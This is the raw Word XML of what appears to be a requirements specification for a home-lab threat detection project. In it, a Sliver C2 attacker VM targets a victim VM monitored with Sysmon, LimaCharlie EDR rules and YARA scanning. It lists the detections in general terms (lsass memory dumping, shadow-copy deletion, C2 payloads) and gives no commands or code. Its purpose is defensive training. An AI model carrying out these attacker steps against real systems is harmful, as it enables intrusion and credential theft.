          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>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Virtual Machine Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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allow users to create and manage virtual machines for the attacker and victim simulations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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provide options to configure virtual machine settings, including operating system, network interfaces, and resource allocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system shall enable users to start, stop, and reset virtual machines.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Attack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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enable users to launch a Sliver C2 server on the attacker VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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facilitate the generation of a C2 payload for deployment on the victim VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system shall allow users to establish a command and control session between the attacker and victim VMs.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Threat Detection and Response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shall provide the option to integrate with Sysmon for advanced log monitoring on the victim VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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integrate with LimaCharlie EDR to collect system logs from the victim VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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allow users to define D&amp;R rules that specify how to detect and respond to specific threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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be able to detect threats, such as:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
          <w:tab w:val="clear" w:pos="817"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="81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Attempts to dump the lsass.exe process from memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
          <w:tab w:val="clear" w:pos="817"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="817" w:leftChars="0" w:hanging="397"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Attempts to delete volume shadow copies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>on the victim machine via accessing it’s shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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Upon detecting a threat, the system shall trigger the corresponding D&amp;R rule based on user-defined actions, which may include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:firstLine="7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 xml:space="preserve">-  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blocking the malicious process or application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="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Isolating the infected VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="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Sending an alert notification to the user.</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Automated YARA Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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allow users to add YARA signatures for malware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">(sliver) which is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Segoe UI" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">published </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Segoe UI" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Segoe UI" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>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"https://www.ncsc.gov.uk/"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UK National Cyber Security Centre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u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Segoe UI" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>on Sliver.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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automatically scan newly downloaded files and launched processes on the victim VM based on user-defined scanning rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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generate alerts and provide information about identified potential malware based on YARA signatures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> at specific system paths.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3.1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Other Nonfunctional Requirements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Performance Requirements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Resource utilization (CPU, memory) by the system should be within reasonable limits to avoid impacting the performance of the host system.</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Security Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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be implemented with security considerations in mind to minimize potential vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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shall utilize secure communication protocols (e.g., HTTPS) for communication between the system and the EDR server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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Users with administrative privileges shall be required to access and manage the system's configurations and D&amp;R rules.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Software Quality Attributes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Usability: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The user interface should be intuitive and user-friendly for users with varying levels of technical expertise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Reliability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system should function consistently and reliably throughout its operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Maintainability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The code should be well-documented and modular to facilitate future modifications and maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>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bCs/>
          <w:color w:val="2F528D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F528D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Abbreviations and Acronyms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F528D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="11"/>
        <w:tblW w:w="86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6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7" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Terms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6012" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve">Abbreviations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SRS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6012" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing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Software Requirement Specifications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C2</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Command and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D&amp;R</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Detection and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EDR</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Endpoint Detection and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Sysmon</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lang w:val="en-IN"/>
              </w:rPr>
              <w:t>System Monitor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VM</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Virtual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SSH</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sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Secure Shell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SOC</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sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Security Operations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LSASS</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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Local Security Authority Subsystem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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2607" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>YARA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6012" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Yet Another Recursive Acronym</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F528D"/>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F528D"/>
          <w:sz w:val="6"/>
          <w:szCs w:val="6"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F528D"/>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
          <w:u w:val="single"/>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3.2 Use Case Diagram</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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Use Case Diagram for the cyber threat detection and response system provides a visual representation of the interactions between actors and the system, illustrating the various use cases or scenarios in which actors interact with the system to achieve specific goals or tasks. The diagram depicts the roles of different actors, such as users, systems, or external entities, and their relationships with the system's functionalities.</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704205" cy="2992755"/>
            <wp:effectExtent l="0" t="0" r="10795" b="17145"/>
            <wp:docPr id="5" name="Picture 5" descr="Screenshot 2024-02-29 09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29 093553"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5704205" cy="299275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Actors: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Security Analyst:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> A user responsible for monitoring security events, analyzing threats, and responding to security incidents within the cyber threat detection and response system.</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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Monitor Security Events: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monitors incoming security events and alerts generated by the system.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view real-time updates on system activities, including network traffic, system logs, and user behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Analyze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analyzes detected threats and investigates suspicious activities to determine their nature and severity.</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review detailed information about security incidents, including indicators of compromise (IOCs) and attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Configure Detection Rules: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configures detection rules and policies to customize the system's threat detection capabilities.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define rules for identifying suspicious behaviors, known malware signatures, and abnormal network activities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Initiate Response Actions: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initiates response actions to contain and mitigate detected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perform actions such as isolating compromised systems, blocking malicious activities, and quarantining infected files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Collaborate with Team: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collaborates with other team members to coordinate response efforts and share insights on detected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communicate findings, share investigative data, and discuss mitigation strategies through integrated collaboration tools.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Relationships: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Security Analyst actor interacts with all use cases, representing their involvement in monitoring, analyzing, configuring, and responding to security events and threats within the system.</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99430" cy="4013200"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="1" name="Picture 1" descr="Screenshot 2024-02-29 09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29 093535"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5599430" cy="401320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3.3 Sequence Diagram</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Threat Detection and Response Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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Security Event Monitoring and Detection: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system continuously monitors security events, including network traffic, system logs, and user behavior.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Upon detecting a suspicious event, the system generates an alert and initiates the threat detection process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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Threat Analysis and Investigation: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Security Analyst receives the alert and begins analyzing the detected threat.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investigate the nature and severity of the threat, gathering additional data and context to assess its impact.</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676900" cy="3190240"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="6" name="Picture 6" descr="Screenshot 2024-02-29 09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29 094730"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5676900" cy="319024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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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Configuration of Detection Rules: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If necessary, the Security Analyst may configure or refine detection rules to enhance the system's threat detection capabilities.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They define new rules or adjust existing ones to better identify similar threats in the future.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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Initiation of Response Actions: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Upon confirming the threat, the Security Analyst initiates response actions to contain and mitigate the impact of the security incident.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lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The system executes the response actions, implementing the configured rules and policies to neutralize the threat.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315884"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="315884"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
